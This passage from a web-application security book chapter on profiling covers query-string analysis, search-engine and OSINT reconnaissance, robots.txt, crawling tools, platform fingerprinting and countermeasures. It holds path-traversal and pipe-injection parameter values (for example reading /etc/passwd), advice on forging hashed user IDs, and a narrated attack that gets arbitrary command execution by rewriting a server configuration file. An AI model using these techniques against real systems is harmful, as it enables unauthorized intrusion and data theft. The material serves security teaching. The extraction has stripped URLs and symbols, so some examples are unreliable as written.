the point of a 404 error, we can assume that the removed section was the file. And you can always copy the text from the error message and see if you can find any application documentation using Google. In the upcoming section entitled “Common Web Application Profiles,” we’ll provide plenty of examples of query string structure fingerprints. We’ve shown a couple here to whet your appetite: or even !OpenDatabase (Lotus Domino) SESSIONID (junk)&BV ENGINEID (junk) (BroadVision) Chapter 2: Profiling 63 Query String / /folder/filename/paramname=paramvalue /folder/file/paramname¶mvalue /folder/(SessionState)/file/paramvalue Table 2-3 Common Query String Structure Conclusion Simple, standard URL parameter structure. Filename here looks like a folder. Equal sign is represented by &. Session state kept in the URL—it’s hard to determine where a file, folder, or parameter starts or ends. Analyzing Query Strings and Parameters Collecting query strings and parameters is a complicated task that is rarely the same between two applications. As you collect the variable names and values, watch for certain trends. We’ll use the following example (again) to illustrate some of these important trends: testing&resultPage testing &db /templates/db/archive.db There are three interesting things about these parameters: • The resultPage value is equal to the search term—anything that takes user input and does something other than what it was intended for is a good prospect for security issues. • The name resultPage brings some questions to mind. If the value of this parameter does not look like a URL, perhaps it is being used to create a file or to tell the application to load a file named with this value. • The thing that really grabs our attention, however, is db=/templates/db/ archive.db, which we’ll discuss next. Table 2-4 shows a list of things we would try within the first five minutes of seeing the db=/[path] syntax in the query string. Any application logic that uses the file system path as input is likely to have issues. These common attack techniques against web application file-path vulnerabilities will illustrate the nature of many of these issues. We would also try all of these tactics on the resultPage parameter. If you want to really dig deeper, then do a search for search.cgi archive.db, or learn more about how the search engine works, or assume that “db” is the database that is being searched. 64 Hacking Exposed Web Applications Parameter db=/../../../../etc/passwd db=/templates/db/ db=/templates/db/%00 db=/templates/db/junk.db db=|ls or db=|dir db= db=* db=/search.cgi templates/db/ archive.db templates/db/ Implications File retrieval possible? Pass in boot.ini or some other file if it’s win32. Can we get a directory listing or odd error? Use the NULL byte trick to grab a directory listing or other odd errors. What happens when we pass in an invalid database name? Attempt to use the old Perl pipe trick. Always try blank. If we use *, will it search all the databases in the configuration? What happens if we give it an existing filename on the web site? Might dump source code? Can we just download the DB file directly? Can we retrieve a directory listing? Table 2-4 Attack Attempts and Implications Be creative—perhaps you could guess at other hidden database names that might contain not-for-public consumption information; for instance: db=/templates/db/current.db db=/templates/db/intranet.db db=/templates/db/system.db db=/templates/db/default.db Here are some other common query string/parameter “themes” that might indicate potentially vulnerable application logic: • User identification Look for values that represent the user. This could be a username, a number, the user’s social security number, or another value that appears to be tied to the user. This information is used for impersonation attacks. Relevant strings are userid, username, user, usr, name, id, uid. For example: /login?userid 24601. Chapter 2: Profiling 65 Don't be intimidated by hashed values to these user parameters. For instance, you may end up with a parameter that looks like this: /login?userid 7ece221bf3f5dbddbe3c2770ac19b419 In reality, this is nothing more than the same userid value just shown but hashed with MD5. To exploit this issue, just increment the value to 24602 and MD5 that value and place it as the parameter value. A great tactic to use to identify these munged parameter values is to keep a database of hashes of commonly used values such as numbers, common usernames, common roles, and so on. Then, taking any MD5 that is found in the application and doing a simple comparison will catch simple hashing techniques like the one just mentioned. • Session identification Look for values that remain constant for an entire session. Cookies also perform session handling. Some applications may pass session information on the URL. Relevant strings are sessionid, session, sid, and s. For example: /menu.asp?sid 89CD9A9347 • Database queries Inspect the URL for any values that appear to be passed into a database. Common values are name, address information, preferences, or other user input. These are perfect candidates for input validation and SQL injection attacks. There are no simple indicators of a database value other than matching a URL’s action with the data it handles. For example: /dbsubmit.php?sTitle Ms&iPhone 8675309 • Look for encoded/encrypted values Don’t be intimidated by a complexlooking value string in a parameter. For instance, you might see ASP.NET’s viewstate parameter: " VIEWSTATE dDwtNTI0ODU5MDE1Ozs+ZBCF2ryjMpeVgUrY2eTj79HNl4Q " This looks complex, but it's nothing more than a Base64-encoded value. You can usually determine this by just seeing that the string consists of what appears to be random upper- and lowercase A–Z and 0–9 with perhaps a scattered few +'s and /'s. The big giveaway is the = sign (or two) at the end of the string. It's easy to pass this string through a base64 decoder tool and see what the site's developers are keeping in there. Some other common encoding/encryption algorithms used in web applications include MD5, SHA-1, and the venerable XOR. Length is usually the key to detecting these. Be careful though; many web applications will combine multiple hashes and other types of data. Identifying things like the separators is key to making it easier to determine what is being used. • Boolean arguments These are easy to tamper with since the universe of possible values is typically quite small. For example, with Boolean arguments such as “debug,” attackers might try setting their values to TRUE, T, or 1. Other Boolean parameters include dbg, admin, source, and show. 66 Hacking Exposed Web Applications Common Cookies The URL is not the only place to go to recognize what type of application is running. Application and web servers commonly carry their own specific cookie, as the examples in Table 2-5 illustrate. Backend Access Points The final set of information to collect is evidence of backend connectivity. Note that information is read from or written to the database when the application does things like updating address information or changing passwords. Highlight pages or comments within pages that directly relate to a database or other systems. Certain WebDAV options enable remote administration of a web server. A misconfigured server could allow anyone to upload, delete, modify, or browse the web document root. Check to see if these options are enabled (we’ll talk more about how to identify and assess WebDAV in Chapter 3). Search Tools for Profiling Search engines have always been a hacker’s best friend. It’s a good bet that at least one of the major Internet search engines has indexed your target web application at least once in the past. The most popular and effective search engines at the time of this writing include Google, Bing, Yahoo!, Ask, AOL, and many others (you can find links in the “References & Further Reading” section at the end of this chapter). Our personal favorite is Google. Here are some of the basic techniques we employ when taking a search engine–based approach to web application profiling (the following examples are based on Google’s syntax): • Search for a specific web site using “” (with the quotation marks) to look for URLs that contain • Search for pages related to a specific web site using to return more focused results related to • Examine the “cached” results that pull the web page’s contents out of Google’s archive. Thus, you can view a particular page on a site without leaving the comfort of It’s like a superproxy! Software IIS 5/6 ColdFusion J2EE Applications Cookie Structure ASPSESSIONID=[string] cfid=[number] cftoken=[number] jsessionid=[string] Table 2-5 Common Cookies Used by Off-the-Shelf Web Software Chapter 2: Profiling 67 • Investigate search results links called similar pages. These work like the “related” keyword noted earlier. • Examine search results containing newsgroup postings to see if any relevant information has been posted about the site. This might include users complaining about login difficulties or administrators asking for help about software components. • Make sure to search using just the domain name such as This can return search results such as “” or “”. • To locate specific file types use the filetype operator, such as “filetype:swf”, which will filter the results to only include Flash SWF files that contain the corresponding keywords of your search. Another really effective way to leverage search to profile a site is to pay close attention to how the application interacts with its URLs while inspecting a site. Attempt to pick out what is unique about the URL. For instance, it could be a filename or an extension or even the way the parameters work. You want to try to identify something fixed, and then perform a Google search on that and see if you can find any documentation or other sites that might be running it. For example, during a recent assessment of an application, we were clicking through and studying how the URLs were set up. The homepage URL looked something like the following: http://site/wconnect/ace/home.htm A link on the homepage to “online courses” appeared as follows: https://site/wconnect/wc.dll?acecode%7ESubGroup%7EONL%7EOnline%2BCourses Following this link, we navigated our way further into the site, noting the following URLs: https://site/wconnect/ wc.dll?acecode~GroupCatalog~GROUP~ONLFIN~Financial+ Planning+Online~ONL https://site/wconnect/ wc.dll?acecode~GroupCatalog~GROUP~ONLFIN~Financial+ Planning+Online~ON L~&ORDER=LOCATION Notice that everywhere we turned, parameters were being passed to wc.dll. So we needed to find out just a little bit more about this file. To do so, we took /wconnect/ wc .dll to Google and ran a search. The results gave us a list of other sites also running this file. After some quick research, we identified the file as belonging to an application called “Web Connection” developed by West-Wind. Digging even further, we went to the support section on West-Wind’s site and found the administration guide. And while reading the documentation, we noticed a web-based administration page available at http://site/wconnect/admin.asp. So we returned to the web site and attempted to access this page. But our request for the administration page was welcomed with an “IP address rejected” error because we were attempting to access a restricted area from an unauthorized IP address. This appears to be good use of access control lists (ACLs) by 68 Hacking Exposed Web Applications the administrator. We figured this could really be a dead end because we wouldn’t be able to figure out a way to spoof our IP address. Because we live for challenges, however, we returned to the documentation once again. It was then that we noticed there was a URL that allowed us to access a status page of the application just by inputting http:// This page is shown in Figure 2-5. Through this request, we managed to access the application’s status page successfully. When we looked closely at the status page, we noticed something interesting: a link that read “Back to Admin Page.” This was noteworthy, as we hadn’t come to this page from the admin page! When clicking the link, it sent us back to the admin.asp page, which was denied (as expected). But we knew we were onto something worth investigating. We felt we were on the brink of a penetration as we had just accessed an administrative function without accessing the administrative page. After returning once again to the documentation, we learned that the administration page is simply a jump-off page from the function calls implemented by wc.dll. Thus, if we knew the administrative function calls, we could just call them directly through the wc.dll file without having to access the admin.asp page. This is just the kind of breakthrough that makes all of the work and the research of profiling worthwhile! We returned to the documentation to identify all of the function calls that may provide deeper access into the system and find anything interesting that could prove helpful in our task. Within the manual, we found a description of the parameters of the wconnect.ini file from which the application reads its settings. The documentation mentioned a parameter that can be defined that runs an .exe file. This is what the documentation stated: Figure 2-5 The _maintain~ShowStatus parameter output from the wc.dll dynamic page generation component Chapter 2: Profiling 69 “StartEXE: Starts an EXE specified in ExeFile in the DLL ini file for file based messaging. The EXE is started in the System context so it will run invisibly when started from a service.” This was exactly what we were looking for. Now we needed a way to modify the value of this parameter so it would launch the .exe file that we would define. Luckily, we found an API in the documentation called “wwMain~EditConfig.” The documentation noted that this API call permitted editing of the Web Connection Configuration files remotely. The documentation helpfully described a link that displays a page with the server’s config files for remote editing: Bingo, just what we needed! We inserted this URL into our browser and up popped the page we needed to edit and update the .ini files. We then found the ExeFile parameter and changed the value to c:\winnt\system32\cmd.exe /c "dir /S c:\ > d:\ inetpub\ wwwroot\dir.txt". This is shown in Figure 2-6. That gave us the full directory listing of all of the files on the system and dumped them into a text file located in the web root. We updated the .ini file. Now, the only thing left to do was to figure out a way for the appserver to reread the configuration file so that our command would be executed. Looking back in the documentation, we found exactly what we needed: http://site .com/wc.dll?_maintain~StartExe. This would cause the application to restart and run our command. When it was finished, we had access to our newly created file by accessing All this started from a simple Google query! Remember this as you consider the structure and logic of your web site. We’ll talk about possible countermeasures to this approach in the “General Countermeasures” section later in this chapter. Figure 2-6 Manipulating the ExeFile parameter to execute arbitrary commands on a victim system. My, what you can find with Google! 70 Hacking Exposed Web Applications Open Source Intelligence Beyond Google there are other search engines with a specific focus that can be invaluable in finding specific information. Whether you want to find information on a person or inquire about public records, chances are a specialized search engine has been made to find what you desire. Services such as Melissa Data can help you freely gather information on people associated with a target web application. Even an e-mail address or a phone number for human resources affiliated with a target may be as valuable as—or more valuable than—information on technical resources when profiling a target application. A tool that automates much of the effort in gathering such information is Maltego. Defined as an open source intelligence-gathering tool, Maltego helps visualize the relationships among people, organizations, web sites, Internet infrastructure, and many other links. Figure 2-7 shows Maltego profiling a web site. Maltego can aid in information gathering, and it can find affiliations between components within an organization. Even with information as simple as a domain name or an IP address, it can query publicly available records to discover connections. A complete list of the queries the tool can perform can be found at http://ctas.paterva .com/view/Category:Transforms. Figure 2-7 The open-source intelligence tool Maltego profiles a web site. Chapter 2: Profiling 71 Social networks are another growing source of intelligence. A hypothetical attack might involve a malicious user joining LinkedIn ( and posing as an employee of a particular company. He could connect to other employees and gain information on them that could then be leveraged for further attacks. To deflect such attacks, users of social networks need to beware of where they share sensitive information and with whom they share it. Businesses have begun to raise awareness of such risks through internal education campaigns and, in some instances, have even begun to monitor employee Twitter feeds and Facebook profiles for sensitive information related to work projects. In March 2010, Israeli military officials cancelled a planned attack after a combat soldier leaked details on his Facebook page. Fearing the enemy had read the information pertaining to the specific time and location of the strike, the officials deemed it too risky to continue with the planned operation. Without proper education and a policy for employees to follow, this type of information leak could happen at any organization. Robots.txt Before we depart our tour of the many uses of Internet search engines, we want to make note of one additional search-related issue that can greatly enhance the efficiency of profiling. The robots.txt file contains a list of directories that search engines such as Google are supposed to index or ignore. The file might even be on Google, or you can retrieve it from the site itself: [root@meddle]# /robots.txt User-agent: * Disallow: /Admin/ Disallow: /admin/ Disallow: /common/ Disallow: /cgi-bin/ Disallow: /scripts/ Disallow: /Scripts/ Disallow: /i/ Disallow: /images/ Disallow: /Search Disallow: /search Disallow: /links Disallow: /perl Disallow: /ipchome Disallow: /newshome Disallow: /privacyhome Disallow: /legalhome Disallow: /accounthome Disallow: /productshome Disallow: /solutionshome Disallow: /tmpgeos/ 72 Hacking Exposed Web Applications A file like this is a gold mine! The Disallow tags instruct a cooperative spidering tool to ignore the directory. Tools and search engines rarely do. The point is that a robots.txt file provides an excellent snapshot of the directory structure—and maybe even some clear pointers toward misconfigurations that can be exploited later. Skeptical that sites no longer use the robots.txt file? Try this search on Google (“parent directory” should be in double quotes as shown): “parent directory” robots.txt. Automated Web Crawling We’ve spent a great deal of time enumerating manual techniques for profiling web applications and the infrastructure that supports them. We hope that it’s been an informational tour of the “under-the-hood” techniques of web application profiling. As interesting as these techniques are, we’re the first to admit that they are numbingly repetitive to perform, especially against large applications. As we’ve alluded to several times throughout this discussion, numerous tools are available to automate this process and make it much easier. We’ve noted that one of the most fundamental and powerful techniques used in profiling is the mirroring of the entire application to a local copy that can be scrutinized slowly and carefully. We call this process web crawling, and web crawling tools are an absolute necessity when it comes to large-scale web security assessments. Your web crawling results will create your knowledge-baseline for your attacks, and this baseline is the most important aspect of any web application assessment. The information you glean will help you to identify the overall architecture of your target, including all of the important details of how the web application is structured, input points, directory structures, and so on. Some other key positives of web crawling include the following: • Spares tons of manual labor! • Provides an easily browseable, locally cached copy of all web application components, including static pages, executables, forms, and so on. • Enables easy global keyword searches on the mirrored content (think “password” and other tantalizing search terms). • Provides a high-level snapshot that can easily reveal things such as naming conventions used for directories, files, and parameters. As powerful as web crawling is, it is not without its drawbacks. Here are some things that it doesn’t do very well: • Forms Crawlers, being automated things, often don’t deal well with filling in web forms designed for human interaction. For example, a web site may have a multistep account registration process that requires form fill-in. If the crawler fails to complete the first form correctly, it may not be able to reach the subsequent steps of the registration process and will thus miss the privileged Chapter 2: Profiling 73 pages that the application brings you to once you successfully complete registration. • Complex flows Usually, crawling illustrates logical relationships among directories, files, and so on. But some sites with unorthodox layouts may defy simple interpretation by a crawler and require that a human manually clicks through the site. • Client-side code Many web crawlers have difficulty dealing with client-side code. If your target web site has a lot of JavaScript, there’s a good chance you’ll have to work through the code manually to get a proper baseline of how the application works. This problem with client-side code is usually found in free and cheap web crawlers. You’ll find that many of the advanced commercial crawlers have overcome this problem. Some examples of client-side code include JavaScript, Flash, ActiveX, Java Applets, and AJAX (Asynchronous Java and XML). • State problems Attempting to crawl an area within a web site that requires web-based authentication is problematic. Most crawlers run into big trouble when they’re asked to maintain logged-in status during the crawl. And this can cause your baseline to be cut short. The number of techniques that applications use to maintain state is amazingly vast. So we suggest that you profile the authenticated portions of the web site manually or look to a web security assessment product when your target site requires that you maintain state. No freeware crawler will do an adequate job for you. • Broken HTML/HTTP A lot of crawlers attempt to follow HTTP and HTML specifications when reviewing an application, but a major issue is that no web application follows an HTML specification. In fact, a broken link from a web site could work in one browser but not another. This is a consistent problem when it comes to an automated product’s ability to identify that a piece of code is actually broken and to automatically remedy the problem so the code works the way Internet Explorer intends. • Web services As more applications are designed as loosely coupled series of services, it will become more difficult for traditional web crawlers to determine relationships and trust boundaries among domains. Many modern web applications rely on a web-based API to provide data to their clients. Traditional crawlers will not be able to execute and map an API properly without explicit instructions on how execution should be performed. Despite these drawbacks, we wholeheartedly recommend web crawling as an essential part of the profiling process. Next, we’ll discuss some of our favorite web crawling tools. Web Crawling Tools Here are our favorite tools to help automate the grunt work of the application survey. They are basically spiders that, once you point to an URL, you can sit back and watch 74 Hacking Exposed Web Applications them create a mirror of the site on your system. Remember, this will not be a functional replica of the target site with ASP source code and database calls; it is simply a complete collection of every available link within the application. These tools perform most of the grunt work of collecting files. We’ll discuss holistic web application assessment tools, which include crawling functionality, in Chapter 10. Lynx Lynx is a text-based web browser found on many UNIX systems. It provides a quick way to navigate a site, although extensive JavaScript will inhibit it. We find that one of its best uses is for downloading specific pages. The dump option is useful for its “References” section. Basically, this option instructs lynx to simply dump the web page’s output to the screen and exit. You can redirect the output to a file. This might not seem useful at first, but lynx includes a list of all links embedded in the page’s HTML source. This is helpful for enumerating links and finding URLs with long argument strings. [root@meddle]# lynx –dump > homepage [root@meddle]# cat homepage ...text removed for brevity... References 1. en 2. en 3. en 4. 5. 6. 7. If you want to see the HTML source instead of the formatted page, then use the source option. Two other options, crawl and traversal, will gather the formatted HTML and save it to files. However, this is not a good method for creating a mirror of the site because the saved files do not contain the HTML source code. Lynx is still an excellent tool for capturing single URLs. Its major advantage over the getit scripts is the ability to perform HTTP basic authentication using the auth option: [root@meddle]# lynx -source Looking up Making HTTPS connection to Secure 168-bit TLSv1/SSLv3 (EDH-RSA-DES-CBC3-SHA) HTTP connection Sending HTTP request. HTTP request sent; waiting for response. Alert!: Can't retry with authorization! Contact the server's WebMaster. Can't Access `' Chapter 2: Profiling 75 Alert!: Unable to access document. lynx: Can't access startfile [root@meddle]# lynx -source -auth user:pass \ > Private Intranet Wget Wget ( is a command-line tool for Windows and UNIX that will download the contents of a web site. Its usage is simple: [root@meddle]# wget -r --18:17:30-- > `' Connecting to connected! HTTP request sent, awaiting response... 200 OK Length: 21,924 [text/html] 0K .......... .......... . 100% @ 88.84 KB/s 18:17:31 (79.00 KB/s) - `' saved [21924/21924] Loading robots.txt; please ignore errors. --18:17:31-- > `' Connecting to connected! HTTP request sent, awaiting response... 200 OK Length: 458 [text/html] 0K 100% @ 22.36 KB/s ...(continues for entire site)... The r or recursive option instructs wget to follow every link on the home page. This will create a directory and populate that directory with every HTML file and directory wget finds for the site. A major advantage of wget is that it follows every link possible. Thus, it will download the output for every argument that the application passes to a page. For example, the viewer.asp file for a site might be downloaded four times: • viewer.asp@ID=555 76 Hacking Exposed Web Applications • viewer.asp@ID=7 • viewer.asp@ID=42 • viewer.asp@ID=23 The @ symbol represents the ? delimiter in the original URL. The ID is the first argument (parameter) passed to the viewer.asp file. Some sites may require more advanced options such as support for proxies and HTTP basic authentication. Sites protected by basic authentication can be spidered by: [root@meddle]# wget -r --http-user:dwayne --http-pass:woodelf \> --20:19:11-- > `' Connecting to connected! HTTP request sent, awaiting response... 200 OK Length: 251 [text/html] 0K 100% @ 21.19 KB/s ...continues for entire site... Wget has a single purpose: to retrieve files from a web site. Sifting through the results requires some other simple command-line tools available on any Unix system or Windows Cygwin. Burp Suite Spider Burp Suite is a set of attack tools that includes a utility for mapping applications. Rather than having to follow links manually, submitting forms, and parsing the responses, the Burp Spider will automatically gather this information to help identify potentially vulnerable functionality in the web application. Add the site to be crawled to the current target scope and then simply browse the application using the Burp proxy after enabling the Spider feature. Further options can be configured via the Options tab. Teleport Pro Of course, for Windows users there is always something GUI. Teleport Pro ( brings a graphical interface to the function of wget and adds sifting tools for gathering information. With Teleport Pro, you can specify any part of a URL to start spidering, control the depth and types of files it indexes, and save copies locally. The major drawback of this tool is that it saves the mirrored site in a Teleport Pro Project file. This TPP file cannot be searched with tools such as grep. Teleport Pro is shown in Figure 2-8. Black Widow Black Widow extends the capability of Teleport Pro by providing an interface for searching and collecting specific information. The other benefit of Black Widow is that you can download the files to a directory on your hard drive. This directory is more user-friendly to tools like grep and findstr. Black Widow is shown in Figure 2-9. Offline Explorer Pro Offline Explorer Pro is a commercial Win32 application that allows an attacker to download an unlimited number of her favorite web and FTP sites for later Chapter 2: Profiling 77 Figure 2-8 Teleport Pro’s many options offline viewing, editing, and browsing. It also supports HTTPS and multiple authentication protocols, including NTLM (simply use the domain\username syntax in the authentication configuration page under File | Properties | Advanced | Passwords for a given Project). We discuss Offline Explorer Pro throughout this book, since it’s one of our favorite automated crawling tools. Common Web Application Profiles We’ve covered a number of web application profiling techniques, from manual inspection and using Internet search engines like Google, to automated crawling approaches. Let’s apply these techniques to a few common off-the-shelf enterprise applications to illustrate how you can recognize them using these simple methods. Oracle Application Server Most Oracle applications contain a main subfolder called /pls/. This is where everything in the application is appended. This /pls/ folder is actually Oracle’s PL/SQL module, 78 Hacking Exposed Web Applications Figure 2-9 Black Widow mirrors site contents to the local drive. and everything that follows it are call parameters. To help you understand, take a look at this Oracle Application URL: TEXT RPT? p arg names prog nbr&p arg values 39.001 In this example, /pls/ is the PL/SQL gateway; /Index/ is the Database Access Descriptor; and CATALOG. is a PL/SQL package that has the PROGRAM_TEXT_RPT procedure, which accepts the parameters on the rest of the URL. Detecting an Oracle server is typically very easy because the directory is a dead giveaway. Also, Oracle’s convention of naming its scripts and PL/ SQL package with full words such as somename.someothername is another telltale sign. It is also common to see Oracle names in all capital letters, such as NAME.SOMENAME. And many Oracle names will also end with a procedure such as .show or a URL that looks like this: Chapter 2: Profiling 79 When you see this type of structure, you are most likely looking at an Oracle application. BroadVision Here’s an example of a BroadVision URL. We’ve placed numbers in bold within this example to highlight some key features. programView.(2)do?(3)pageTypeId 8155&programPage /jsp/www/content/ generalContentBody.jsp&programId 8287&channelId -8246&(1)BV SessionID NNNN1053790113.1124917482NNNN&BV EngineID cccdaddehfhhlejcefecefedghhdfjl.0 1. The killer signature here is the parameter names: BV_SessionID and BV_ EngineID. If you see these anywhere in a URL, you have nailed a BroadVision application. How much more simple can it get? 2. BroadVision applications also usually have .do script extensions. 3. Most BroadVision applications also have parameter names that tend to end in xxxxId=nnnn. By looking at the URL, you’ll notice three parameters that are named this way (pageTypeId=8155, programId=8287, channelId= 8246). This naming scheme is unique in that ID is spelled with a capital I and lowercase d, and usually the value contains a number that is four or more digits. This is a nice way of detecting BroadVision without obvious clues. Here’s another example BroadVision URL: Main.jsp?pagetype careers&template Careers. jsp&categoryOId -8247&catId -8247&subCatOId -8320&subtemplate Content.jsp At first glance, we would suspect BroadVision is present because of the lowercase ds in the IDs and the familiar four or more numeric digits in the values. Another clue that raises our confidence level is the fact that they’re negative numbers—something you see a lot of in BroadVision applications. PeopleSoft Here’s an example of a PeopleSoft URL. We’ve again placed numbers in bold within this example to highlight some key features. ROLE APPLICANT.ER APPLICANT HOME(1).GBL?(2)NAVSTACK Clear 80 Hacking Exposed Web Applications 1. The file extension is a clear giveaway here: .GBL exists in most URLs of sites that run PeopleSoft. 2. NAVSTACK= is also a fairly common thing to see in most PeopleSoft installations. But be careful! There are a lot of PeopleSoft installations without this parameter. 3. Folders and filenames in PeopleSoft tend to be all capitalized. Another item that gives away PeopleSoft is cookies. PeopleSoft usually sets the following cookies: PORTAL-PSJSESSIONID DMsdZJqswzuIRu4n; PS TOKEN AAAAqwECAwQAAQAAAAACvAAAAAAAAAAsAARTaGRyAgBOdwgAOAAuADEAMBR dSiXq1mqzlHTJ9ua5ijzbhrj7eQAAAGsABVNkYXRhX3icHYlbCkBQFEWXRz4MwRzo dvMaAPElmYDkS0k+FIMzONs9q7PatYDb84MQD53// k5oebiYWTjFzsaqfXBFSgNdTM/EqG9yLEYUpHItW3K3KzLXfheycZSqJR97+g5L; PS TOKENEXPIRE 24 Aug 2005 17:25:08 GMT; PS LOGINLIST; You will usually see the PORTAL PSJSESSIONID cookie in most PeopleSoft applications. The other three cookies that you see are far less common. In most cases, you’ll find detecting PeopleSoft installations easy because PeopleSoft is clearly identified in the URL. But you can’t just rely on URLs to spot PeopleSoft; many times developers so heavily customize their applications that detecting what application is actually running becomes difficult. So we’ll spend some time discussing how PeopleSoft applications behave and look. Trying to recognize an application through its behavior and “feel” will become easier as you gain experience dealing with web applications. Let’s walk through an example of how to fingerprint an application based on feel and look. Like many applications, PeopleSoft acts in a unique way. Most PeopleSoft applications will have a menu on the left and a large frame on the right. When clicking the menu items on the left—they are typically direct URLs; you will see the URLs change as you click—the page will load on the right. The content of the page on the right will usually be heavily written with JavaScript. And each link and button typically launches some type of JavaScript action. That’s why, as you hover over these links, you’ll often see plenty of “javascript:” links that will either perform a submit command or open a new window. That’s one of the reasons you can spot a PeopleSoft application right away. Because most web application servers are highly customizable, telling one web server from another is difficult without studying the URL or the technical specifications. But there are subtle things that you can look for that will help to indicate what application is running. For example, a PeopleSoft application is highly customizable, so it might be difficult to tell a PeopleSoft application by the standard profiling methods via URL or query recognition. Yet most PeopleSoft applications are easily distinguishable by the interface components that are used. For example, in the following two screenshots, you can see both the menu and standard login screen of a known PeopleSoft application: Chapter 2: Profiling 81 The following shows a screenshot of an application that is suspected to be a PeopleSoft application, but the URL gives no indication of the usual PeopleSoft parameter structure ( Compare the look and feel of this screenshot with the known PeopleSoft menu shown above. Look at the menus. PeopleSoft’s menus always tend to be very square and almost Xwindows-like. And they will usually have a – in front of all items. Notice how the menu font, size, and color are the same. Also notice the color and shape of the Continue button. Do you see how the button color and look are the same? We have detected that this application is running PeopleSoft just by looking at it. Another example of this might be Lotus Domino; Lotus makes heavy use of collapsible trees that usually have a certain feel to them. For instance, they may have arrows that point to the side for closed trees or point down for open trees. If we see that behavior on a tree on a web site, it may be a clue that Domino is being used. 82 Hacking Exposed Web Applications Lotus Domino By now you should have a good understanding of how to quickly start picking areas to look for in a URL to identify what applications are running. Let’s take a look at how we determine whether Lotus Domino is being used. Here’s an example of a Lotus Domino URL. We’ve again placed numbers in bold within this example to highlight some key features: MeetingsSpeakers(2)?OpenDocument$file/ InstructionsforRequestForm.doc!OpenDatabase&db /global/gad/ gad02173.nsf&v 10E6&e us&m 100A&c 7A98EB444439E608C1256D630055064E 1. The common extension is .nsf. Notice that the extension is .nsf but what looks like folders after this file are actually parameters. realtor.nsf is the only file and following it are parameters to that file. 2. OpenDocument is a Lotus Action; there are many others. WebSphere Here’s an example of a WebSphere URL. We’ve again set numbers in bold within this example to highlight some key features: proddisp.(2)d2w/(3)report?prrfnbr 3928&prmenbr 991&CATE &grupo 1. Look for these keywords in the path: /ExecMacro/, /ncommerce3/, and /Macro/. 2. Look for the extension .d2w. 3. WebSphere tends to always have /report? parameters. WebSphere usually has a session cookie like the following: SESSION ID 28068215,VzdMyHgX2ZC7VyJcXvpfcLmELUhRHYdM91 +BbJJYZbAt K7RxtllNpyowkUAtcTOm; GENERAL COUNTERMEASURES As we have seen, much of the process of profiling a web application exploits functionality that is intended by application designers—after all, they do want you to browse the site quickly and easily. However, we have also seen that many aspects of site content and Chapter 2: Profiling 83 functionality are inappropriately revealed to anonymous browsers due to some common site-design practices and misconfigurations. This section will recount steps that application designers can take to prevent leaks great and small. A Cautionary Note After seeing what information is commonly leaked by web applications, you may be tempted to excise a great deal of content and functionality from your site. We recommend restraint, or, to put it another way, “Careful with that axe, Eugene.” The web administrator’s goal is to secure the web server as much as possible. Most information leakage can be stopped at the server level through strong configurations and least-privilege access policies. Other methods require actions on the part of the programmer. Keep in mind that web applications are designed to provide information to users. Just because a user can download the application’s local.js file doesn’t mean the application has a poor design; however, if the local.js file contains the username and password to the application’s database, then the system is going to be broken. Protecting Directories As we saw many times throughout this chapter, directories are the first line of defense against prying profilers. Here are some tips for keeping them sealed. Location Headers You can limit the contents of the Location header in the redirect so it doesn’t display the web server IP address, which can point attackers toward discrete servers with misconfigurations or vulnerabilities. By default, IIS returns its IP address. To return its fully qualified domain name instead, you need to modify the IIS metabase. The adsutil.vbs script is installed by default in the Inetpub\adminscripts directory on Windows systems: D:\Inetpub\adminscripts\adsutil.vbs set w3svc/UseHostName True D:\Inetpub\adminscripts\net start w3svc Apache can stop directory enumeration. Remove the mod_dir module during compilation. The change is simple: [root@meddle apache 1.3.23]# ./configure --disable-module dirConfiguring for Apache, Version 1.3.23 Directory Structure and Placement Here are some further tips on securing web directories: • Different user/administrator roots Use separate web document roots for user and administrator interfaces, as shown on the next page. This can mitigate 84 Hacking Exposed Web Applications the impact of source-disclosure attacks and directory traversal attacks against application functionality: /main/ maps to D:\IPub\pubroot\ /admin/ maps to E:\IPub\admroot\ • IIS Place the InetPub directory on a volume different from the system root, e.g., D:\InetPub on a system with C:\WINNT. This prevents directory traversal attacks from reaching sensitive files like \WINNT\repair\sam and \WINNT\ System32\cmd.exe. • UNIX web servers Place directories in a chroot environment. This can mitigate the impact of directory traversal attacks. Protecting include Files The best protection for all types of include files is to ensure that they do not contain passwords. This might sound trivial, but anytime a password is placed in a file in clear text, expect that password to be compromised. On IIS, you can change the file extension commonly used for include files (.inc) to .asp, or remap the .inc extension to the ASP engine. This change will cause them to be processed server-side and prevent source code from being displayed in client browsers. By default, .inc files are rendered as text in browsers. Remember to change any references within other scripts or content to the renamed include files. Miscellaneous Tips The following tips will help your web application resist the surveying techniques we’ve described in this chapter: • Consolidate all JavaScript files to a single directory. Ensure the directory and any files within it do not have “execute” permissions (i.e., they can only be read by the web server, not executed as scripts). • For IIS, place .inc, .js, .xsl, and other include files outside of the web root by wrapping them in a COM object. • Strip developer comments. A test environment should exist that is not Internetfacing where developer comments can remain in the code for debugging purposes. • If a file must call any other file on the web server, then use path names relative to the web root or the current directory. Do not use full path names that include drive letters or directories outside of the web document root. Additionally, the script itself should strip directory traversal characters (../../). • If the site requires authentication, ensure authentication is applied to the entire directory and its subdirectories. If anonymous users are not supposed to access ASP files, then they should not be able to access XSL files either. Chapter 2: Profiling 85 SUMMARY The first step in any methodology is often one of the most critical, and profiling is no exception. This chapter illustrated the process of profiling a web application and its associated infrastructure from the perspective of a malicious attacker. First, we discussed identification of all application-related infrastructure, the services the applications are running, and associated service banners. These are the initial strokes on the large canvas that we will begin to paint as the rest of this book unfolds. Next, we covered the process of cataloging site structure, content, and functionality, laying the groundwork for all of the subsequent steps in the web application security assessment methodology described in this book. It is thus critical that the techniques discussed here are carried out consistently and comprehensively in order to ensure that no aspect of the target application is left unidentified. Many of the techniques we described require subtle alteration depending on the uniqueness of the target application, and as always, clever inductions on the part of the surveyor will lead to more complete results. Although much of the process of surveying an application involves making valid requests for exported resources, we did note several common practices and misconfigurations that can permit anonymous clients to gain more information than they should. Finally, we discussed countermeasures to some of these practices and misconfigurations that can help prevent attackers from gaining their first valuable foothold in their climb toward complete compromise. At this point, with knowledge of the make and model of web server software in play, the first thing a savvy intruder will seek to do is exploit an obvious vulnerability, often discovered during the process of profiling. We will cover tools and techniques for web platform compromise in Chapter 3. Alternatively, with detailed web application profile information now in hand, the attacker may seek to begin attacking the application itself, using techniques we discuss in Chapters 4 through 9. REFERENCES & FURTHER READING Reference Relevant Vendor Bulletins and Patches Internet Information Server Returns IP Address in HTTP Header (Content-Location) Web Server/App Firewalls Teros application firewalls F5’s TrafficShield Application Link ?kbid=218180 Firewall: 86 Hacking Exposed Web 